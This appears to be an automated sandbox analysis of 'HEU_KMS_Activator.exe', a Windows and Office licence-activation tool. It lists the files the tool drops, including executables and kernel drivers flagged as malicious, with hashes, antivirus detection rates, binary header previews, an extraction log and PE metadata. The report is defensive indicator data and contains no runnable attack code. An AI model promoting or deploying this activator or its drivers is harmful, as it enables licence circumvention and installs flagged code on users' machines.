Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PC bitmap, Windows 3.x format, 46 x 46 x 24, image size 6442, resolution 3779 x 3779 px/m, cbSize 6496, bits offset 54
Category:dropped
Size (bytes):6496
Entropy (8bit):4.626099001444027
Encrypted:false
SSDEEP:96:POqX7999EYqJFiEv4s/Jy/kDDwboUZhVrY+16by8KnKfh/Lz3OlpD:PHuniK/isD7MYW6by8KnKJ/Lzg
MD5:DF9507E7162CAE71289767F393B75507
SHA1:0934DF7CC1DD458CF1180D19007E9A36973F1BD0
SHA-256:59D0339D7BD251BC7A22457C9A9673B700B5639EA6E9F4330AD3240C7191D7F0
SHA-512:512342CB1D8E25A8FF1C12099A8E7EC0B1E31FF3D5B1F80C717F30B258785FAA8FA306E47AB9B8FE62E4506F51C4C8D979ECE0E85A971FEFA6C12DC4B46F6EA6
Malicious:false
Preview:BM`.......6...(...................*............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y..z..y..y..y..y..z..y..x..y..u...........................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 360x140, components 3
Category:dropped
Size (bytes):76526
Entropy (8bit):7.734924468356919
Encrypted:false
SSDEEP:1536:Q6pxTuc6pxTuaZeAfRE76Kv/PwQNwNn8C:QAKcAK2e0Ehv/PHw9x
MD5:5076A9A63ABEE8F983A3B340EF94493C
SHA1:0C1C672E7FBC7047052F3995E91813373215A8FB
SHA-256:B41530F2A85CE734F0AE97A60CCA72AABF330D8F06113DDA9852E4AF586AE1ED
SHA-512:3338059C180A9A94CAE34FDEAFA6EBAA430288172501FCD25994868A2F074DD748BCB2087C7E6120E00FE2E75E48E69AF05E22AF85284C5E3211040E88F2FCC7
Malicious:false
Preview:....'.Exif..MM.*...........................[...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS5.1 Windows.2019:07:28 00:18:16.............0221.......................h...........................................n...........v.(.....................~..........&P.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 7 icons, 16x16, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
Category:dropped
Size (bytes):22798
Entropy (8bit):4.242608019081887
Encrypted:false
SSDEEP:192:K6DuuuuuuD8o8o9o19d8opquXy1TyeL5555555SbdYelRI9IRc9lRt:nPm65555555SbdT70MY7
MD5:3B456048C963F39B7B918C34742DFF8D
SHA1:8DD5BD2F1DC5F896D3CB14CDEC7691C42A60EC9A
SHA-256:D352BBE8C271CC9007A841A5B7DB960262FC85CAE580F9814EB0B5C7E7E0B7E8
SHA-512:ABC38E1DE5D9C982975965B784B692F6E8220BCB6E19CF0E66105A3207477F7CC03710E4563AA86666CFC4C411B0EA110C9E9EFE827D26EA76A5E82010629A96
Malicious:false
Preview:..............(...v...00.............. ..........F...........h.......00.... ..%..V... .... ......C........ .h....T..(....... ...............................................................................................................nnn............;................nn.o.;.......................333...........{;7.....:z:.....{77...........s.s................................................................(...0...`.....................................n...p...............::..EF..xx..Q..Q..].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
Category:dropped
Size (bytes):25214
Entropy (8bit):5.715974967201889
Encrypted:false
SSDEEP:384:8kwAAjAAj0kwdWSTAAjAA8q2Mps3Di0fVvSqzj2K3B38AhAytrq9h+Aemrs:8kC0BdWSMqBa3DigF19vq9ds
MD5:94306384EFDADFDCEA096A022738BF1E
SHA1:72385C23173686AC2500BA3BCA094C0C94E76212
SHA-256:9672B50641BA9F9F1735FEE2D3BA4FDC5BDA18545530EE1869E01C25618C1345
SHA-512:38F7DE2AB148DAEA9F879665459FE374B1032B10EB1BE6769FA17FFC8FC9B12A4BF8B9822A3BCA2C8704AEC7A996D5FE058E2A759A21F351162A8FCCA729BBDF
Malicious:false
Preview:......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`.........................................................................................................................................................v|....................l........................|..w.................||..................|l~....~................|l.|.w.................|......x..................................l|...................l|.g..|...~..........|l.v.......w.........l|v..|~......~~.v.........|.l........|...............g....|...~......||n...~....|.........|.l|.|l~.............ll|g..|||...|...w...........|l.....n.|.......v......|.....~~.~g.........l.....~..........|||f.......~.nw.......lv~.....~....~..X~............||l...~.......|...||.|l.g...|.~.h...h...v~.|.g..........|.|...........||......v..~g....||.~|...n...|.|.|..|.....|n....w.....|...g..|....~W..||.....n...|~.|~p..|
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6656
Entropy (8bit):4.2431777583260875
Encrypted:false
SSDEEP:96:G9lk4Roy4A+WJAHOSmTsz7TRHWfUwtdkS6hJTZNZ6tkG:G9aHy4A+WJEOSmAPT6VdkS6hJTZr6t
MD5:5C5DC1D8085A9DF4CC44F5F39630297D
SHA1:5F82A6B89BCCAF37849B943C99B49FAC204F7450
SHA-256:A6B7BCC8E941A7AAFB8C077DC4B17344A965E7E0DA0F012D24F27B982434850E
SHA-512:9E9029DED4CFDA70A229B88CA0088B53703DFA8AC8BC88DA8A8A8C8E8080F87E610D4F42900A8D7619BF87CB95C887557DBE3054FD6663A24F07F00F074D9BA1
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 46%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&'i.....................................Rich...................PE..d...^.y[.........." ................D........................................P............`.........................................0%..d....%..<...........(!..l............@......."..T............................................ ..(............................text............................... ..`.rdata..r.... ......................@..@.data...@....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):559528
Entropy (8bit):6.0903310211485335
Encrypted:false
SSDEEP:12288:ZM9AwIce16TCkcgxjouFmQGzt/B6QziZUt2qaV7se:ZM9Sce16TCkcgxMuFmQGztZZiSAqA7R
MD5:3E350EB5DF15C06DEC400A39DD1C6F29
SHA1:F1434CFEF2C05FDA919922B721EC1A17ADB3194E
SHA-256:427FF43693CB3CA2812C4754F607F107A6B2D3F5A8B313ADDEE57D89982DF419
SHA-512:B6B6CDFE2B08AA49254E48302385A3A2A8385E2228BDCFFD3032757ACF1A1D4ABFF1270F5488083CFA4480439FF161A9D0EA5F193CABC1EB1E7B1255CE262AB6
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..0..c..c..c...c..cs.>c..c.o.c..c.o>c'.c.o?c..c...c..c..c..c.o:c..c.o.c..c...c..c.o.c..cRich..c........................PE..d...QLNP..........".................8..........@.....................................'....@.................................................t...........`....`..|>...r...............................................................................................text............................... ..`.rdata..............................@..@.data....T.......,..................@....pdata..|>...`...@..................@..@.rsrc...`............L..............@..@.reloc..0............`..............@..B........................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (native) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):18432
Entropy (8bit):5.6059836483155925
Encrypted:false
SSDEEP:384:QKSNkidSydP2bVSxvdor3nu0+BrRrbOj2tKABxfvL33k:b8mW+nu04r6StKABm
MD5:95F143EC661A5DA85C3C8199D9FE06E7
SHA1:94EE8C5856DC0570A8F12CD08ECB0560F3A61908
SHA-256:F239C27B50CEF792FEA5B34378FBAC83BCC06B8442D508BD9ADD7DDF8CA5C632
SHA-512:0FE0304F4FD4810A6AAB5F35410B195C44302332C721EBFDB1C87E3081EC98A9EA9EC796BB135883DDF2906D82DB51D29E34017C989F4F8AD4E17BBB1B00781E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....W.\...........".....*..........P..........i..........................................@... ..............................................`..E............................p.......................................................`...............................text....(.......*.................. .P`.data........@......................@.`..idata..E....`.......@..............@.0..reloc.......p.......F..............@.0B................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):19968
Entropy (8bit):5.085145072450436
Encrypted:false
SSDEEP:384:gQAInWKpEFFzpjq37oIOU6GHq33QPiu431VP:gxWTpOFagUb2qiu43P
MD5:162AB955CB2F002A73C1530AA796477F
SHA1:D30A0E4E5911D3CA705617D17225372731C770E2
SHA-256:5CE462E5F34065FC878362BA58617FAB28C22D631B9D836DDDCF43FB1AD4DE6E
SHA-512:E0288DCF78092449D9CBAEF4488041131925387C1AEDC9E9512DA0F66EFE2FB68350CA3937F6715834E62E7C931C5DAD0FC8BC3C6C0C3DAEDEFF356D6FEAAC2E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./eb*k..yk..yk..y.s.ym..y.r.yh..yk..y...y.r.ye..y.r.yn..y.s.yj..y.s.yj..y.s.yh..y.s.yj..yRichk..y................PE..d...%..N.........."..........4......H..........@.........................................`..................................................K..d............p..................$...p2...............................................0..8....K..`....................text............................... ..`.rdata..."...0...$... ..............@..@.data........`.......D..............@....pdata.......p.......J..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):829264
Entropy (8bit):6.55381739669424
Encrypted:false
SSDEEP:12288:3gzGPEett9Mw9HfBCddjMb2NQVmTW752fmyyKWeHQGokozS:QzJetPMw9HfBCrMb2Kc6ymyyKWewGzUS
MD5:DF3CA8D16BDED6A54977B30E66864D33
SHA1:B7B9349B33230C5B80886F5C1F0A42848661C883
SHA-256:1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36
SHA-512:951B2F67C2F2EF1CFCD4B43BD3EE0E486CDBA7D04B4EA7259DF0E4B3112E360AEFB8DCD058BECCCACD99ACA7F56D4F9BD211075BD16B28C2661D562E50B423F0
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pm...>...>...>..>...>...>F..>...>...>...>..>...>..>...>D..>...>...>...>...>...>...>Rich...>........................PE..d...J._M.........." ..........................sy............................. ............@.........................................pt.......`..(...............pb......P............................................................................................text...F........................... ..`.rdata..............................@..@.data...L}... ...R..................@....pdata..pb.......d...Z..............@..@_CONST..............................@...text.....2... ...4..................@.. data.........`......................@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5632
Entropy (8bit):4.264726183608833
Encrypted:false
SSDEEP:48:S59peUoC03vzDgEMiaWxOj+t5hOl/kTlh3RyZbbR0iPhNh26hYEvYZ18BtaQKzrS:G96ChFCOj2h3nuPhyZyKrHX8t
MD5:E0F0683BB8CFD4413ECCD777034E6A20
SHA1:620DFE7713B9464041846FA9C7B4385F04B15F92
SHA-256:31CFC14E37DF7DECE15E696966AF362098BF04D6CFFFAE780412D98CC90EADD4
SHA-512:A47C8CD4BB6A8C0890373EE012EDC386BE19F7B3F037BE43EF713B3FBD1EF0D25D7B1C399EB28C50601599FBF0EBEAB390E874BC14261C4049498CB7097C90D9
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 33%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&'i.....................................Rich...................PE..L...U.y[.........."!......................... ...............................P............@.........................0"..d....#..<............................@.......!..T............................................ ...............................text...*........................... ..`.rdata....... ......................@..@.data... ....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):454056
Entropy (8bit):6.343666374450724
Encrypted:false
SSDEEP:12288:MqyRLu5aCWoevfZ1PUxHmA7PGbdOv4c54e08MGHb:M3GeAxHmA7PGsvF54e08MG7
MD5:451AE03D3C92777F09840CA56F08AB62
SHA1:328D049DA1814CFE7D1C7783691304577854482F
SHA-256:D5E779D151772504662E8226EB4107330FFA7A51209EEE42B6D5883D99100BA9
SHA-512:76772983A5C9C8C703B5E51F8CA9A0D5594121E42AFA12ADCD2B05753A1F96F97B274CDA9B13251E0DCA0D31AE6A719B2C509AC581BB34C930CCB00141EB9D42
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9YU.}8;.}8;.}8;.t@..|8;..N..y8;.f...g8;.f...G8;.f....8;.t@..h8;.}8:.8;.f...k8;.f...|8;.}8..|8;.f...|8;.Rich}8;.........................PE..L....LNP.............................l....... ....@..........................0............@..................................&..........`........................;..p#.................................@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data....C...@..."...*..............@....rsrc...`............L..............@..@.reloc..Zt.......v...`..............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (native) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):16384
Entropy (8bit):6.251436025932812
Encrypted:false
SSDEEP:192:wi7qjiqTX19HhSeJf322jBDv6IDP7ftUfoQ0MyElxMfMZ4qBxfPbI+Cb5L5ng:pCnJ9HhSeJf322RvRP6FN42xfPL25Fg
MD5:E30B53AEDCB0C17DB66D5B3B3EB9A4BA
SHA1:2D65ACAB9E83B0CAAADEB75424DDAFD2CE8B7851
SHA-256:66FAE80DC13273D3C8FEC2ACB8C0FB1F658D53E34D28CDA4986048B8D1DEA8F2
SHA-512:9E00A3B1B3656891E46B1D48D04A431C3CD10711D57C065D9EE7D3CEA10C139C29B0349666DCB8B2877BCF77E338D22124D699782635994C31B41658FC2F0964
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 13%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.\...........#.....&...................@.....l.........................p......6.....@... ..............................P..u............................`.......................................................P..h............................text...T$.......&.................. .P`.data........@.......*..............@.`..idata..u....P.......8..............@.0..reloc.......`.......<..............@.0B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17408
Entropy (8bit):5.305506970166326
Encrypted:false
SSDEEP:192:Xdaz2FKIaphXuVX3uKny+gASTGWyQG0eJIL+uVl9tUDY5Kajjtl9w++zOzrPwaur:NbFuUOvAiG0gIVDKDYgmh02HPwzi3An
MD5:5FD363D52D04AC200CD24F3BCC903200
SHA1:39ED8659E7CA16AACCB86DEF94CE6CEC4C847DD6
SHA-256:3FDEFE2AD092A9A7FE0EDF0AC4DC2DE7E5B9CE6A0804F6511C06564194966CF9
SHA-512:F8EA73B0CB0A90FAC6032A54028C60119022173334E68DB3FBD63FE173032DD3FC3B438678064EDB8C63D4ECEAA72990CE039819DF3D547D7D7627AD2EEE36B3
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.N0...0...0..._.R.3.....@.6...+.e.3...0...v...+.g.1...+.S.?...+.R.2.....E.2.....D.3.....C.1...Rich0...................PE..L...6..N.................6.........../.......P....@..........................p......".....@..................................>..d............................`..l...@................................%..@............... ....=..`....................text....4.......6.................. ..`.data........P.......:..............@....reloc.......`.......>..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):773968
Entropy (8bit):6.901569696995594
Encrypted:false
SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
MD5:BF38660A9125935658CFA3E53FDC7D65
SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:GIF image data, version 89a, 273 x 273
Category:dropped
Size (bytes):97281
Entropy (8bit):7.82329967382233
Encrypted:false
SSDEEP:1536:O1l8tBhsJe/wPTWxjzm70L/QulTl4UmSjbDXf9bgr5Dm:Ov8uYGT4jqC/5diuXDX165q
MD5:95CCF61C6AB8C98CD9C6F33AB8D4108F
SHA1:4CDA9E213DA3B4D8C87D3C4FCE103544E0FBCD6A
SHA-256:E91A4F80813094EF53A0408D91679E7757E4F71C4ACC9E942E8ACA630BE0DF45
SHA-512:62851F1C1EC3DB6F3382E5C376B8C69C05EA223983A4929E676A5524767465DE42EE75D3E78730750DFE8E231E937CCFA4242A937D14012B581F2F6EE5353370
Malicious:false
Preview:GIF89a.......ua.......{i.`HvlV....xf...........q..............................wd......yf..........p[......~l....~|.............jT~..........n.hR}_GugQ|............~.........................................ta.......................bKx..........nY..........dMy.......{.........|.fO{bJw...eNz.......y.r]......................gP{....................t..........s.....................t.......................|i....yg.....q..........................................oZ...............us....q\.....}............s_........n............................w........xd.........................y.............q.......zg........cLx.................................................................~k....{..r.........om.pn........................^Ft...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="ht
Process:C:\Windows\System32\drivers\DvLayout.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):54224
Entropy (8bit):6.160827902341627
Encrypted:false
SSDEEP:768:865Pg3db7gc9a28CXCgWmOnyX7AO7MCzsrDX8Ztqo8MoUSnS92OgZxSm:82ItbBMK9MOv5ZtawrS
MD5:26153A4FAA0B3573E4BD461C008059FB
SHA1:8B74A646C4300E257E5FDE076C7E3067CD090D60
SHA-256:D48727E1C1550937470D32022762B924DD945457C7CE8962F65B5DE77D3180CA
SHA-512:2104D0580F2E65F7F3D1657702D8B530685FC05121F28297147E04F6FA2025E273C4AC6FB0774160489EB963675A444FC487D4C029325A1C29BD52F89D4DC7B8
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.BZx.,.x.,.x.,.q...{.,.q...z.,.#./.|.,.#.(.k.,.#.)...,.#.-.}.,.x.-.=.,..(...,....y.,.Richx.,.................PE..d....nXT.........."..........N.................@.............................0......^.....`A................................................d...P............................ ..X.......8...........................................................................text...V........................... ..h.rdata..............................@..H.data...\4..........................@....pdata..............................@..HINIT....8........................... ..b.reloc..X.... ......................@..B................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\drivers\DvLayout.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):52176
Entropy (8bit):6.168313221432706
Encrypted:false
SSDEEP:768:kzVadQ7HTk82VE9KRzr9pyOe4ExHtq6Cbf2Q+IRNJ4Z4:kOQ7zvgEHoUqNJ42
MD5:5C2BC53BF68894CD591C5C7D1E690F41
SHA1:C4DDF1F1582D708BE83B8E75CA889F78ED387055
SHA-256:F0BBE441E1C2B926CB215699690D67526E4220534703A7FC4BB9BB20479F2CC2
SHA-512:EA922918C127ABC170EAACF2429483F2300952B3124328375E48DB524625B29741738A9250DCE8DF2D889148F5E04FB73CD3ACECB9FFD5DFD44CC8531218507B
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 88%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..p>..#>..#>..#7.7#=..#7.,#<..#e.."9..#e.."$..#e.."8..#e..";..#>..#y..#..."8..#..@#?..#..."?..#Rich>..#........................PE..d....0.T.........."......n.....................@.............................P.......o......................................................d ..P....0..........8............@..D...0t..8...........................pt...............p.. ............................text...<_.......`.................. ..h.rdata..L....p.......d..............@..H.data....s.......*...t..............@....pdata..8...........................@..HPAGE................................ ..`INIT......... ...................... ..b.rsrc........0......................@..B.reloc..D....@......................@..B................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1398
Entropy (8bit):5.1625187395570125
Encrypted:false
SSDEEP:24:p5gXZWZiTgUw5dZ2ee074cCLkO6DJHASwr466PI5N3I:LioS1G74JLkDVASM5o
MD5:4CFAC5BF1E88341D802A3219640F8408
SHA1:17E79B402C9638636DEAC1934001CFA0502BE29F
SHA-256:F5084C5896C052BF77E0E4FBF84225F13295659E349AB1E9D17A11063E05E2A3
SHA-512:1D274049954C188873A8AC476ADF32E18C6A46C2168C2E0F210D39190E74A2CB740FA87B98716535408A8455ACC3C090CF6972A43C7F714F73D361D2503B097F
Malicious:false
Preview:..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\Windows\_temp07242019502489\KMSmini.7z....Extracting Office2010OSPP..Extracting OtherOfficeOSPP..Extracting pic..Extracting x64..Extracting x86..Extracting pic\ewm_wx.jpg..Extracting pic\ewm_zfb.jpg..Extracting pic\head.jpg..Extracting pic\left.jpg..Extracting pic\office.jpg..Extracting pic\shuoming.jpg..Extracting pic\Windows.jpg..Extracting pic\backup.bmp..Extracting pic\restore.bmp..Extracting pic\amt.ico..Extracting pic\ver.ico..Extracting pic\zanzhu.ico..Extracting HEU_KMS_Renewal.xml..Extracting Office2010OSPP\SLERROR.XML..Extracting OtherOfficeOSPP\slerror.xml..Extracting SvcTrigger.xml..Extracting Office2010OSPP\OSPP.VBS..Extracting OtherOfficeOSPP\OSPP.VBS..Extracting HEU_Configuration.ini..Extracting GetProductKey.data..Extracting SetupComplete.data..Extracting x86\cleanospp.exe..Extracting x64\cleanospp.exe..Extracting kms-client.exe..Extracting kms-serve
Process:C:\Windows\SysWOW64\PING.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):380
Entropy (8bit):4.937448817509359
Encrypted:false
SSDEEP:6:PzLSLzMRfmWxHLThx2LThx2LThx0sW26wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeTeT0sKvtAFSkIrxMVlmJHaVz
MD5:63A3D026F6E4381585F5AEFACE172263
SHA1:3EA8FDD98AA9F20167008F57DAA6F8ED3ECA9738
SHA-256:4C31393CE8AE5EA969A049B3FF5DD0EA18E6C29E0E59841BEC1D7AFB7C64DE4C
SHA-512:FB88787000A6D258A1E3AAB97C46B8D92E68071B8E55C8F98278CB474AE6AFB31256A58BF198132D251F8EC666F28C085A88A103C8DB029B3B188F77163BE793
Malicious:false
Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
File type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Entropy (8bit):7.993629864125517
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:HEU_KMS_Activator.exe
File size:5'596'080 bytes
MD5:28c6bc044e78763a789638242f708f9e
SHA1:d6670c2e2d8646b6ea5acc292bfcb5c6f4f14cd2
SHA256:d9c9cbc0fccd8f456e76d55b3be079b4f062272e2777f02d7438de4310357e36
SHA512:c13d8d828af2abc565d948e0c1a53abbbb59e9f287f0b10594cc2220d6de5c3c470f135607f376af19af3eddbc989682ac4fd235bca8c5b315ce7678d6f3641d
SSDEEP:98304:bdla5HdWHBZayoEsPYIqWUBeKLomp5LvJ1Rk2GtUGJnEGFyP+u09cJhUy:bdWdCZaZPYhWUBeKLXpdte8WiJhUy
TLSH:4B461180B401C77FF4D22FF0ADD83D914AF97EA01E990210A2296F2EB4E72757DE8595
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e.J..n...n...n.E.1...n.E.3...n...o...n.......n.......n.......n.Rich..n.........PE..L...r..T.................b....... ...7.....
Icon Hash:b2b2b2b2a2b2a2b0
Entrypoint:0x403783
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x54A61472 [Fri Jan 2 03:45:54 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:17ae050e88c8032ac67ecaa16e8b6361
Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00408A00h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebx
call dword ptr [00408288h]
push 00000008h
mov dword ptr [004488D8h], eax
call 00007F962CAC13C5h
push ebx
push 00000160h
mov dword ptr [004487E0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebx
push 00408A93h
call dword ptr [00408158h]
push 00408A88h
push 004447E0h
call 00007F962CAC1105h
call dword ptr [004080B0h]
push eax
mov edi, 00471000h
push edi
call 00007F962CAC10F3h
push ebx
call dword ptr [0040810Ch]
cmp byte ptr [00471000h], 00000022h
mov dword ptr [004487E8h], eax
mov eax, edi
jne 00007F962CABEC3Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00471001h
push dword ptr [esp+14h]
push eax
call 00007F962CAC0E66h
push eax
call dword ptr [00408228h]
mov dword ptr [esp+1Ch], eax
jmp 00007F962CABEC95h
cmp cl, 00000020h
jne 00007F962CABEC38h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F962CABEC2Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h
Programming Language:
  • [ C ] VS2005 build 50727
  • [RES] VS2005 build 50727
  • [LNK] VS2005 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8ebc | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8f000 | 0x137f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
